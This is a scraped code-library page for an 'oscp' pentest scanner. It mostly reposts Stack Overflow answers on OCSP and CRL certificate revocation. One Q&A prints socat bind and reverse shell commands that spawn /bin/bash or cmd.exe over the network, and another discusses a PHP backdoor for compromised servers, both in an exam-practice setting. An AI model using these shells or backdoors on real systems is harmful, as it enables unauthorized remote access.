kandi X-RAY | oscp Summary
kandi X-RAY | oscp Summary
oscp
Support
Quality
Security
License
Reuse
Top functions reviewed by kandi - BETA
- Run nmap scan .
- Connect to a remote host .
- Write data to file .
- Performs an http scan .
- Performs https .
- Run smtp - scan
- Runs a UDP scan .
- Perform directory scan .
- Run NIKTO - scan on the given ip address .
- Performs a mssql script scan .
oscp Key Features
oscp Examples and Code Snippets
Community Discussions
Trending Discussions on oscp
QUESTION
The first image is from a pdf signature which is LTV enabled. This document is not created by me.
In the revocation information, it shows the following text:
The selected certificate is considered valid because it has not been revoked as verified using the Online Certificate Status Protocol (OCSP) response that was embedded in the signature.
I do sign a pdf document using iText and I also apply an OCSP.
...ANSWER
Answered 2021-Apr-28 at 15:57You add one OCSP response, the one you retrieve here:
QUESTION
How do I make a simple request for certificate revocation status to an EJBCA OSCP Responder using the Python requests library?
Example:
...ANSWER
Answered 2020-Nov-01 at 13:49Basically it involves the following steps:
- retrieve the corresponding cert for a hostname
- if a corresponding entry is contained in the certificate, you can query the extensions via AuthorityInformationAccessOID.CA_ISSUERS, which will provide you with a link to the issuer certificate if successful
- retrieve the issuer cert with this link
- similarly you get via AuthorityInformationAccessOID.OCSP the corresponding OCSP server
- with this information about the current cert, the issuer_cert and the ocsp server you can feed OCSPRequestBuilder to create an OCSP request
- use
requests.getto get the OCSP response - from the OCSP response retrieve the
certificate_status
To retrieve a cert for a hostname and port, you can use this fine answer: https://stackoverflow.com/a/49132495. The OCSP handling in Python is documented here: https://cryptography.io/en/latest/x509/ocsp/.
Code
If you convert the above points into a self-contained example, it looks something like this:
QUESTION
I have a certificate that does not have an OSCP responder URL and it has 3 CRL endpoints configured. The first url only works from within my corporate network, the second and third can be accessed from outside.
The issue is when I do a chain.Build() on my certificate on a .net core 3.1 service, running on an Alpine base image in AKS cluster, it returns false with the chain element's status as "Unable to get certificate CRL". Since, my pods are not on corpNet anyway, I would expect the chain.Build() to somehow do a round-robin on the endpoints but I am not sure how it actually works.
Is there a way we can hit the other endpoints and get the CRLS?
...ANSWER
Answered 2020-Sep-02 at 19:31No, the Linux implementation of X509Chain only tries the first HTTP endpoint for a CRL distribution point.
QUESTION
I am digitally signing a PDF with iText7 and GlobalSign DSS. I implemented the GlobalSing DSS API calls into the necessary iText classes. I get the proper server responses and I am able to call the pdfSigner.signDetached() method with all the needed arguments. Signing with the pdfSigner also succeeds and I get a signed PDF that looks good at first sight. But when I open the signed pdf in Adobe Reader it tells me that the trust chain of the signing certificate is broken and that it can not trace it back to the CA root. Which is strange because it is an AATL certificate and the AATL list of the Adobe Reader is up to date.
And I do not understand why this is happening.
This is what I do :
call DSS for an identity : returns an id string, the signing certificate and an ocsp response
call DSS for the trustchain : returns the chain of certificates used to
sign the signing certicate, up to the GlobalSign root, together with
their oscp responses (except for the root)I create an array of X509Certificate objects containing the signing
certificate, 2 intermediates and the GlobalSign root certificate (in that order)I implement an IOcspClient that uses the ocsp response from the DSS call for the identity
I implement an ITsaClient that calls the DSS API /timestamp/{digest}
and finally I execute : pdfSigner.signDetached(externalDigest, externalSignature, chain.toArray(new X509Certificate[]{}), null, dssOcspClient, dssTSAClient, 0, PdfSigner.CryptoStandard.CMS);
in which the externalSignature (an implementation of IExternalSignature) will call the DSS identity/{id}/sign/{digest} API
While debugging into the signDetached method and deeper into the pdfSigner code, I clearly see that all certificates are in the chain in the right order. I see them being processed in the PdfPKCS7 class (however I don't know/understand exactly what is going on there). I see the signing taking place, no exceptions are thrown and at the end the produced PDF looks like it is correctly signed. Which Adobe says is not.
What am I missing here ?
The trustchain response from de DSS API not only returns the certificates from the chain of trust of the signing certificate, but also the ocsp responses for the two intermediates between the signing certificate and the GlobalSign root. These are never used. And in fact I don't know what to do with them either.
Could these be the missing pieces for AdobeReader to reconstruct the trust chain up to the GlobalSign root ?
And if so : how do I put them into that PDF ?
And if not : then what am I doing wrong that breaks that trustchain ?
An answer to these questions would save my day :-)
Here is the link to a PDF that will show the problem :
test pdf signed with DSS
(after accepting the answer, I removed the example pdf on my client's request)
Below are some pieces of the code.
The center piece that gathers the DSS info and calls the signDetached method
ANSWER
Answered 2020-Apr-08 at 14:14Your signer certificate is invalid.
In detailYour signer certificate and its certificate chain (according to issuer/subject match) are embedded in the signature, in particular your certificate with subject
cn=Homologatie Voertuigen, ou=Departement Mobiliteit en Openbare Werken, ou=Vlaams Huis voor de Verkeersveiligheid, o=Ministeries van de Vlaamse Gemeenschap, l=Brussel, st=Brussel, c=BE
and its claimed issuer
cn=GlobalSign CA 5 for AATL, o=GlobalSign nv-sa, c=BE
Thus, one can check the signature with which your certificate is signed. And while doing so one sees that the TBSCertificate part of your signer certificate (the to-be-signed part) has this digest value
QUESTION
I'm trying to learn about certificate and CRL handling, so I created the following example certificate chain:
Root CA (self-signed) → Intermediate CA (signed by Root CA) → Server Cert (signed bei Intermediate CA)
Now I would like to test certificate revocation to be effective. To do so, I revoke the Server Cert and create a CRL file (of the Intermediate CA) accordingly. The X509v3 CRL Distribution Points are present in all of the certificate files, and they are accessible via http, like:
...ANSWER
Answered 2020-Mar-20 at 18:16Indeed there were mainly two mistakes I had made:
- The CRL file mandatorily has to be in DER format, which I did not know. (Conversion from the PEM format is simple:
openssl crl -in ${crlFile}.pem -outform DER -out ${crlFile}). - Of course, a certicate's CRL distribution point has to be the one of its parent CA. (So, e. g. for my intermediate CA, it must be the one of the root CA.)
Keeping this in mind and also chaining the intermediate CA certs to the server certs, as dave_thompson_085s very helpful comments suggested, the original command
QUESTION
Hey guys I need your help here !
I recently upgraded my OSCP material to get the new OSCP version 2020 and I came across the chapter with socat to create encrypted bind shell/reverse shell.
I thought I understood how to use it, but my attempts to send an encrypted reverse shell from my windows machine to my Kali machine has been unsuccessfuls.
I decided to do some trials and error with an unencrypted bind shell on both sides.
Here is what worked for me :
- Kali Bind Shell (Getting /bin/bash on Windows by connecting to the kali binded shell socket)
- Kali Reverse Shell (Getting /bin/bash on Windows by sending it to the windows listening socket)
Here's what did not worked for me :
- Windows Bind Shell (Getting cmd.exe by connecting to the windows listening shell socket)
- Windows Reverse Shell (Getting cmd.exe by sending it to the Kali listening socket)
Here is what i did :
Kali Bind Shell - OK
Kali (192.168.119.145)
socat -d -d -d TCP4-LISTEN:4444,fork EXEC:/bin/bash
Windows 10 (192.168.145.10)
socat -d -d -d - TCP4:192.168.119.145:4444
Kali Reverse Shell - OK
Windows 10 (192.168.145.10)
socat -d -d -d TCP4-LISTEN:4444,fork STDOUT
Kali (192.168.119.145)
socat -d -d -d TCP4:192.168.145.10:4444 EXEC:/bin/bash
Windows Bind Shell - NOT OK
Windows 10 (192.168.145.10)
socat -d -d -d TCP4-LISTEN:4444,fork EXEC:cmd.exe
Kali (192.168.119.145)
socat -d -d -d - TCP4:192.168.145.10:4444
Windows Reverse Shell - NOT OK
Kali (192.168.119.145)
socat -d -d -d TCP4-LISTEN:4444,fork STDOUT
Windows 10 (192.168.145.10)
socat -d -d -d TCP4:192.168.119.145:4444 EXEC:cmd.exe
Here is what I get :
Windows bind shell - Windows Machine
...ANSWER
Answered 2020-Feb-19 at 13:38Windows machine (copy the .pem file from kali):
socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0 STDOUT
Kali machine: socat OPENSSL:192.168.X.X:443,verify=0 EXEC:/bin/bash
QUESTION
I am working with data tables, and I want to filter my data table field 4. how can I filter if contains one of the keyword then do something?
ANSWER
Answered 2019-Oct-16 at 13:03var keywords = ['aslr', 'ida pro', 'gdb', 'windbg', 'immunity debugger', 'boofuzz', 'peach fuzzer', 'winafl', 'python', 'assembly', 'penetration testing', 'exploits', 'metasploit', 'metasploit framework', 'ethical hacker', 'pentest', 'computer security', 'hacking', 'oscp', 'osce', 'osee', 'penetration testing', 'offensive security', 'red team', 'vulnerability research', 'vulnerability researcher', 'fuzzing', 'clang', 'llvm', 'address sanitizer', 'afl', 'fuzzers','penetration tester']
columnDefs: [{
targets: 4,
render: function (data) {
for (var i = 0; i < keywords.length; i += 1) {
if (data.indexOf(keywords[i]) != -1) {
return "FOUND";
}
}
return "NOT_FOUND";
}
}
QUESTION
I can't get CRLs working on iOS. I've created two test cases. I have a certificate that is valid, issued by a CA. I have another certificate that is valid, issued by a CA, but the CA has added that certificate to its CRL.
I then setup a revocation policy that enables CRL checking, and requires that it succeeds.
...ANSWER
Answered 2019-Oct-12 at 21:31On Apple platforms, clients do neither check Certificate Revocation List (CRL) of CAs, nor do they use OCSP by default.
Apple platforms however are supporting OCSP stapling and alternatively they provide a mechanism that they call Revocation Enhancement, which could indeed lead to a OCSP call, see details below.
OCSP Stapling
First an explainantion of OCSP stapling:
The Online Certificate Status Protocol (OCSP) stapling, formally known as the TLS Certificate Status Request extension, is a standard for checking the revocation status of X.509 digital certificates.1 It allows the presenter of a certificate to bear the resource cost involved in providing Online Certificate Status Protocol (OCSP) responses by appending ("stapling") a time-stamped OCSP response signed by the CA to the initial TLS handshake, eliminating the need for clients to contact the CA, with the aim of improving both security and performance.
see https://en.wikipedia.org/wiki/OCSP_stapling
Differences between OCSP and OCSP Stapling
If a client connects to a server in a traditional OCSP flow and retrieves the certificate, it checks whether the certificate received has been revoked by making a request to the CA. This has some disadvantages, for example, an additional network connection is required, the information is unencrypted and therefore represents a data privacy problem.
Through OCSP stapling, the server requests a signed revocation information from the CA and adds it to the TLS handshake.
This also means, when using OCSP stapling, you do not see an OCSP request from iOS to a CA server.
Drawbacks of OCSP Stapling
The server you are connecting to must support OCSP stapling. This also does not protect against malicious servers.
That are the main reasons why Apple is providing a Revocation Enhancement.
Apple's Revocation Enhancement
Here's how it works:
- certificate transparancy logs entries are gathered by Apple
- with this info Apple gathers information about revocations from the CAs
- this aggregated information is then automatically made available to all Apple clients on a regular basis
- based on this information, when an iOS app attempts to connect to the server with a revoked certificate, it performs an additional check via OCSP.
Requirement
The only requirement for an app to support this is that the server certificate used be added to a certificate transparency log. Normally a CA does that already, but you should check that the domain certificate is in the active transparency logs for public certificates, e.g. by using the following link: https://transparencyreport.google.com/https/certificates
WWDC 2017, session 701
There is an excellent WWDC session in which this topic and Apple's motives are explained in detail: WWDC 2017, session 701: https://developer.apple.com/videos/play/wwdc2017/701/
Around minute 12:10 an Apple engineer explains the entire revocation topic in detail. At around 15:30 she explains that normal OCSP would require the use of additional APIs.
Test of OCSP Stapling on iOS
For a test we need a server that supports OCSP stapling and uses a revoked certificate: https://revoked.grc.com (found this server in this serverfault answer: https://serverfault.com/a/645066)
Then we can try to connect from iOS with a small test program that tries to download the HTML response and output it to the console.
Based on the information from the WWDC session mentioned above, the connection attempt should fail.
QUESTION
I have a PHP script that I am developing as a backdoor to be uploaded to a compromised server/application in a pentest - As part of a PWK/OSCP. Hence the use of the insecure functions.
I am trying to implement some basic authentication to ensure only the authorised user is able to find and use the backdoor.
The issue that I have is that once the user is logged in, when a command or upload is executed the script goes back into the login() function instead of rendering the results of, for example ls or any other system command.
I have tried calling displayForm() from within itself but I get a memory exception.
How can I change the existing script so that the command output is displayed and the form is ready for the follow up command?
The user:password has been set to 1:1 for the purposes of this debugging as the script does not allow blank passwords.
I am not familiar with PHP so please forgive any glaringly badly written code!
...ANSWER
Answered 2019-May-24 at 18:46So the problem is in the line 2 and 3. When you "login" via your login form you are setting the Session variable and you run displayForm() in the same request. But when you submit next form the whole page reloads so the php run whole script from again from top to bottom. The php works only within single request. So that is why you need session. To fix your problem you have to amend the line 2-3 and first check whether the session values are already set. You can do this using simple if condition:
QUESTION
During a mutual client-server authentication with gRPC+protobuf, is there a CRL and/or OSCP Responder check of the status of the certificate?
I need to be sure that I can revoke the certificate on my PKI and that subsequent calls will be blocked even if the certificate is still valid.
...ANSWER
Answered 2019-May-09 at 23:05If we're considering grpc-go, as far as I know, TLS handshake is not implemented by GRPC, it's encapsulated into Go implementation HTTP2 server from the standard library which GRPC relies on. Perhaps it worth checking if OSCP may be enabled on the HTTP2 server side.
Community Discussions, Code Snippets contain sources that include Stack Exchange Network
Vulnerabilities
Install oscp
You can use oscp like any standard Python library. You will need to make sure that you have a development environment consisting of a Python distribution including header files, a compiler, pip, and git installed. Make sure that your pip, setuptools, and wheel are up to date. When using pip it is generally recommended to install packages in a virtual environment to avoid changes to the system.
Support
Reuse Trending Solutions
Find, review, and download reusable Libraries, Code Snippets, Cloud APIs from over 650 million Knowledge Items
Find more librariesStay Updated
Subscribe to our newsletter for trending solutions and developer bootcamps
Share this Page
